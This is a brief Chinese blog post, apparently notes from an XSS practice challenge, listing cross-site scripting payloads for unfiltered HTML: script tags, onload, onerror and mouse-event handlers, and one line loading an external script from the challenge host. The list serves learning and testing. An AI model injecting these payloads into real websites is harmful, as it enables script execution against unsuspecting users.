登录 / 注册
banner
300
1 分钟

XSS

2026年3月1日
无标签

膜拜大神

[!info] archives [ Mi1k7ea ]
d2VsY29tZSB0byBteSBibG9n
https://www.mi1k7ea.com/archives/

无任何过滤直接往div标签内写内容,直接上payload即可。下面将本次用到的XSS payload小结如下:

JavaScript
<script>alert(1)</script>
<body onload=alert(1)>
<body/onload=alert(1)>
<svg onload=alert(1)>
<svg/onload=alert(1)>
<img src onerror=alert(1)>
<input type=image src onerror=alert(1)>
<script src="https://xss.haozi.me/j.js"></script>//加载外部js
<input type=button onclick="alert(1)">//点击按钮
<input onmouseover=alert(1)>//鼠标指针移动到指定的元素上时执行
<input onmousemove=alert(1)>//鼠标移动时执行
......还有其他onmouse系列
<img src=javascript: onmouseover="alert(1)">//鼠标移动指向图片
<img src=javascript: onclick="alert(1)">//鼠标点击图片
END

相关文章

暂无相关文章

© 2026 一个普通的干饭人. All Rights Reserved. / RSS / Sitemap
Powered by Tanstack Start & Flare Stack Blog